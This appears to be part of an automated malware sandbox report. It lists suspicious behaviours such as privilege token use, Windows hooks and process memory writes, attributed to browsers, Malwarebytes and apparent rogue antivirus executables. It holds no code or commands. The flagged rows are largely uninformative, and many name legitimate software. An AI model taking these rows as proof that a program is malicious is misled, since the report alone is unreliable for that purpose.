N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A
N/A N/A C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Desktop\[email protected] N/A
N/A N/A C:\Users\Admin\Documents\[email protected] N/A
N/A N/A C:\Users\Admin\Documents\[email protected] N/A
N/A N/A C:\Program Files (x86)\Security Central\Security Central.exe N/A
N/A N/A C:\Program Files (x86)\Security Central\Security Central.exe N/A
N/A N/A C:\Program Files (x86)\Security Central\Security Central.exe N/A
N/A N/A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
N/A N/A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Program Files (x86)\Security Central\Security Central.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4164 wrote to memory of 5056 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 5056 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4164 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
